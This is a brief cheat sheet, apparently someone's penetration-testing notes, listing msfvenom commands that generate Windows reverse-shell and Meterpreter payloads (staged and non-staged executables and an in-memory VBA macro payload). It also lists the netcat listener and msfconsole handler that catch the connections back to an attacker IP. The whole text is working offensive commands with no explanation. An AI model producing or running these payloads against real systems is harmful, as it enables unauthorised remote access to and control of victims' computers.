Msfvenom

Non-Staged windows EXE

sudo msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.120 LPORT=444 -f exe -o shell.exe
sudo nc -lnvp 444

Non-Stage meterpreter Exe

sudo msfvenom -p windows/x64/meterpreter_reverse_https LHOST=192.168.119.120 LPORT=443 -f exe -o /var/www/html/msfnonstaged.exe

Stage meterpreter Exe

sudo msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.119.120 LPORT=443 -f exe -o msfstaged.exe
sudo msfconsole -q -x "use windows/x64/meterpreter/reverse_https; set LHOST 10.0.0.241; set LPORT 443; exploit"

VBA in memory

msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.119.120 LPORT=443 EXITFUNC=thread -f vbapplication